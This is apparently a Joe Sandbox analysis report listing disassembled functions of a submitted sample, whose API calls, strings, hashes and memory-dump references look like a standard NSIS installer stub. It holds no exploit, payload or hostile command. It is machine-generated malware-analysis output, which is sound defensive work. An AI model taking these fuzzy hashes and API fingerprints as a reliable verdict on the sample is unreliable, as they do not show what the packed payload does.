Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Function 00404850 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040489F
SetWindowTextW.USER32(00000000,?), ref: 004048C9
SHBrowseForFolderW.SHELL32(?), ref: 0040497A
CoTaskMemFree.OLE32(00000000), ref: 00404985
lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5

Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45

Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3

Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

(7B, xrefs: 0040494D
A, xrefs: 00404973

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A
API String ID: 2624150263-3645020878
Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D

Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078

Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
wsprintfA.USER32 ref: 004060B3
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
GlobalFree.KERNEL32(00000000), ref: 0040619C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3

Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04

Strings

%ls=%ls, xrefs: 004060A9
[Rename], xrefs: 0040611D, 0040612F

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD

Function 00402F30 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402F44
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60

Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0

Strings

Error launching installer, xrefs: 00402F80
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
Null, xrefs: 00403029
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
Inst, xrefs: 00403017
soft, xrefs: 00403020

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-787788815
Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

Function 0040640A Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
CoTaskMemFree.OLE32(00000000), ref: 004065B3
lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-730719616
Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043E3
GetSysColor.USER32(00000000), ref: 00404421
SetTextColor.GDI32(?,00000000), ref: 0040442D
SetBkMode.GDI32(?,?), ref: 00404439
GetSysColor.USER32(?), ref: 0040444C
SetBkColor.GDI32(?,?), ref: 0040445C
DeleteObject.GDI32(?), ref: 00404476
CreateBrushIndirect.GDI32(?), ref: 00404480

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A

Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402EA9
GetTickCount.KERNEL32 ref: 00402EC7
wsprintfW.USER32 ref: 00402EF5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
ShowWindow.USER32(00000000,00000005), ref: 00402F27

Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87

Strings

... %d%%, xrefs: 00402EEF

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE

Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
GetMessagePos.USER32 ref: 00404D3D
ScreenToClient.USER32(?,?), ref: 00404D57
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F

Strings

f, xrefs: 00404D6B

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
wsprintfW.USER32 ref: 004067A4
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Strings

%s%S.dll, xrefs: 0040679E
UXTHEME, xrefs: 0040675B
\, xrefs: 0040677A

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
wsprintfW.USER32 ref: 00402E45
SetWindowTextW.USER32(?,?), ref: 00402E55
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67

Strings

verifying installer: %d%%, xrefs: 00402E3A
unpacking data: %d%%, xrefs: 00402E33, 00402E43

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98

Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
wsprintfW.USER32 ref: 00404CB6
SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

%u.%u%s%s, xrefs: 00404C97
(7B, xrefs: 00404C9F

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8

Function 0040667C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
